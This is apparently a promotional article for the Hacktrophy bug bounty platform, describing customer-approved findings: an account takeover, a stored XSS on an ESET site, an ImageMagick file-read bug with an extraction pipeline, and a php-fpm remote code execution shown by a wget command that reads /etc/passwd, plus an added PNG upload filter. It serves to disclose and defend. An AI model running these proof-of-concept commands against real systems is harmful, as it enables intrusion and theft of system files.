CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.
How Hacktrophy helped our customers to reveal critical vulnerabilities
The main advantages of bug bounty programs over traditional penetration tests and security audits:
- Penetration tests are one-time security evaluations of a system or application as of a specific date (unfortunately, only a few customers do regular penetration testing)
- Ethical hackers in bug bounty programs look for security vulnerabilities continuously - whenever a new vulnerability is published, they automatically rescan all applications registered in the bounty programs to check whether they are affected by it.
- They have the maximum incentive to reveal a given vulnerability, because only the first reporter receives the bounty
Two successful hacks of customer applications
Disclaimer: The customers explicitly agreed to the publication of these findings
1. Account Takeover (IDOR)
Direct object reference with significant impact
2. Stored XSS in https://parentalcontrol.eset.com
Located in the Remove button of the "Rules -> Exception" section.
app.hacktrophy.com hack using LFI (local file inclusion) via vulnerable ImageMagick library
hacktrophy is vulnerable to local file inclusion (LFI), due to an outdated version of ImageMagick being used (CVE-2022-44268).

Proof-of-Concept: Log into app.hacktrophy.com and upload the attached `poc.png` as profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). Finally, run...

$ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
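The published trigger for CVE-2022-44268 is a PNG text chunk (tEXt/zTXt/iTXt) whose keyword is "profile": vulnerable ImageMagick builds treated its value as a path to read and embedded that file's content as a raw profile in the converted image, which is exactly what the `identify -verbose` pipeline above extracts. The following upload-side check is an added example, not Hacktrophy's or ImageMagick's code; it walks the PNG chunk structure, verifies CRCs, and rejects files carrying such a chunk before they reach the image pipeline (the 1x1 sample PNG it builds is constructed for the test).

```python
# Added example: reject uploaded PNGs that carry a "profile" text chunk,
# the CVE-2022-44268 trigger, before ImageMagick ever sees the file.
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def iter_chunks(data):
    """Yield (type, body) for every chunk, verifying signature and CRCs."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in %s chunk" % ctype.decode())
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            break


def suspicious_text_chunks(data):
    """Return (chunk type, raw value) for text chunks keyed 'profile' (case-insensitive, as ImageMagick compares it)."""
    hits = []
    for ctype, body in iter_chunks(data):
        if ctype in TEXT_CHUNKS:
            keyword, _, rest = body.partition(b"\x00")
            if keyword.lower() == b"profile":
                hits.append((ctype.decode(), rest[:64]))  # value is a path in the PoC
    return hits


def is_safe_upload(data):
    return not suspicious_text_chunks(data)


def chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def build_png(text_chunks):
    """Constructed 1x1 grayscale PNG with the given (keyword, value) tEXt chunks, for testing only."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit gray
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + pixel
    png = PNG_SIG + chunk(b"IHDR", ihdr)
    for keyword, value in text_chunks:
        png += chunk(b"tEXt", keyword + b"\x00" + value)
    return png + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
```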
Hack of cloud.nethemba.com via RCE via php-fpm
Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043.

PoC:
wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
The ethical hackers spotted these vulnerabilities immediately (there is a direct incentive to be the first one to report), often before official security patches were released.
Thanks to the Hacktrophy bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.
One thousand white hat hackers are usually faster than one black hat hacker.
By Pavol Luptak